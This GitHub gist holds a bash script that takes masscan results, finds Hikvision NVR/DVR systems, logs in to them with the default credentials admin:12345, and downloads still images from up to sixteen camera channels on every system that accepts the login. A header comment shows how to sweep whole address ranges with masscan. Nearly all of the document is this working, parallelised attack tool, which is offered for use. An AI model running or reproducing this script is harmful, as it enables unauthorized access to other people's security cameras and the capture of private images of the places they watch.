Last active
March 4, 2022 04:39
-
-
Save smidgedy/a4c23c93073a25b1af4b9875e657d1f3 to your computer and use it in GitHub Desktop.
This abomination pulls Hikvision NVR/DVR systems out of masscan output JSON, checks them for default creds, and dumps still images from any system it can access to aid identification. Runs faster if you have GNU Parallel. This is what happens when you start a project as a bash one-liner because opening vscode is too much effort.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Masscan - common ports are 80, 81, 8000, 8080, 8081, 8090, 8888, 9000, 9001 | |
| # I do it like this: | |
| # sudo masscan --banners --source-ip <IP not in use on your network> --rate <how fast you can scan>\ | |
| # -iL <list of CIDR to scan> -p <that list of ports above> -oJ <output file.json> | |
| # Output filenames | |
| HIKVISION_LIST_DEFAULT='hikvision-default.txt' | |
| HIKVISION_LIST_NON_DEFAULT='hikvision-nondefault.txt' | |
| # Performance options - multiprocessing (if GNU Parallel present), HTTP timeout in seconds | |
| HIKVISION_PROCESSES='24' | |
| HIKVISION_TIMEOUT='10' | |
| # Number of camera channels to test for | |
| HIKVISION_CHANNEL_COUNT='16' | |
| # Delete any images smaller than this size in bytes - removes junk | |
| IMAGE_THRESHOLD='9999' | |
| # Usage etc | |
| echo "Hikvision NVR/DVR scraper" | |
| echo "-------------------------" | |
| hikvision-usage () { | |
| echo "Use masscan to grab HTTP banners & produce JSON output. This tool then searches" | |
| echo "for matching systems and attempts default credential login. When it succeeds," | |
| echo "it automatically downloads a still image of up to ${HIKVISION_CHANNEL_COUNT} channels. Output gets" | |
| echo "stored in the folder hikvision-scrape/ under your PWD." | |
| echo " " | |
| echo "Usage: hikvision-scrape <masscan-output.json>" | |
| echo " " | |
| echo "Tip: install GNU Parallel for this to run a lot faster." | |
| } | |
| if [ "$#" -ne 1 ]; then | |
| hikvision-usage | |
| echo "Error: Incorrect number of parameters" | |
| exit 1 | |
| elif [ ! -f $1 ]; then | |
| hikvision-usage | |
| echo "Error: Input JSON file not found" | |
| exit 1 | |
| fi | |
| # Clean up temporary file/folders | |
| hikvision-clean () { | |
| rm -rf /tmp/hikvision-scrape | |
| } | |
| # Set up the folder structure. output gets created under PWD | |
| hikvision-mktemp () { | |
| mkdir -p /tmp/hikvision-scrape/thumbs | |
| mkdir -p ./hikvision-scrape/thumbs | |
| touch ./hikvision-scrape/${HIKVISION_LIST_DEFAULT} | |
| touch ./hikvision-scrape/${HIKVISION_LIST_NON_DEFAULT} | |
| } | |
| # Search a masscan JSON file for targets | |
| hikvision-grep () { | |
| # TODO: Replacing with JQ (maybe as an optional dependency would make this more robust) | |
| grep -Fi "DNVRS-Webs" ${1} | sed 's/[",]//g' | awk '{ print "http://" $3 ":" $9; }' >> /tmp/hikvision-scrape/list.txt | |
| sort -u -o /tmp/hikvision-scrape/list.txt /tmp/hikvision-scrape/list.txt | |
| } | |
| hikvision-stills () { | |
| IP=$( echo "${1}" | cut -d/ -f3 | cut -d: -f1 | sed "s/[0-9]*\@//" ) | |
| curl -s --user admin:12345 -o "/tmp/hikvision-scrape/thumbs/${IP}-${2}.jpg" "${1}/ISAPI/Streaming/channels/${2}00/picture" | |
| } | |
| hikvision-test () { | |
| res=$( curl -s --user admin:12345 -m ${HIKVISION_TIMEOUT} "${1}/ISAPI/Security/userCheck" 2> /dev/null ) | |
| if [ "$?" -eq 0 ] && echo "${res}" | grep -F "200" > /dev/null; then | |
| # Default creds found | |
| echo ${1} >> /tmp/hikvision-scrape/${HIKVISION_LIST_DEFAULT} | |
| # Grab channels | |
| for i in $( seq 1 ${HIKVISION_CHANNEL_COUNT} ); do | |
| hikvision-stills ${1} ${i} | |
| done | |
| else | |
| # Non-default creds | |
| echo ${1} >> /tmp/hikvision-scrape/${HIKVISION_LIST_NON_DEFAULT} | |
| fi | |
| } | |
| hikvision-clean-junk () { | |
| find /tmp/hikvision-scrape/thumbs/ -type f -size "-${IMAGE_THRESHOLD}c" -delete | |
| } | |
| hikvision-merge-results () { | |
| if [ -f /tmp/hikvision-scrape/${HIKVISION_LIST_NON_DEFAULT} ]; then | |
| sort -u -o "./hikvision-scrape/${HIKVISION_LIST_NON_DEFAULT}" "/tmp/hikvision-scrape/${HIKVISION_LIST_NON_DEFAULT}" "./hikvision-scrape/${HIKVISION_LIST_NON_DEFAULT}" | |
| fi | |
| if [ -f /tmp/hikvision-scrape/${HIKVISION_LIST_DEFAULT} ]; then | |
| sort -u -o "./hikvision-scrape/${HIKVISION_LIST_DEFAULT}" "/tmp/hikvision-scrape/${HIKVISION_LIST_DEFAULT}" "./hikvision-scrape/${HIKVISION_LIST_DEFAULT}" | |
| fi | |
| mv -f /tmp/hikvision-scrape/thumbs/* ./hikvision-scrape/thumbs/ | |
| } | |
| hikvision-clean | |
| hikvision-mktemp | |
| hikvision-grep ${1} | |
| # GNU Parallel is an optional dependency. It's faster for sure, but not 100% required. | |
| if command -v parallel > /dev/null; then | |
| echo "GNU Parallel found, going faster" | |
| # These symbols need to be accessible inside of GNU parallel | |
| export -f hikvision-test | |
| export -f hikvision-stills | |
| export HIKVISION_LIST_DEFAULT | |
| export HIKVISION_LIST_NON_DEFAULT | |
| export HIKVISION_CHANNEL_COUNT | |
| export HIKVISION_TIMEOUT | |
| parallel -j ${HIKVISION_PROCESSES} --bar -a /tmp/hikvision-scrape/list.txt 'hikvision-test {}' | |
| else | |
| while read NVR; do | |
| echo "Checking ${NVR}" | |
| hikvision-test ${NVR} | |
| done < /tmp/hikvision-scrape/list.txt | |
| fi | |
| hikvision-clean-junk | |
| hikvision-merge-results | |
| hikvision-clean |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment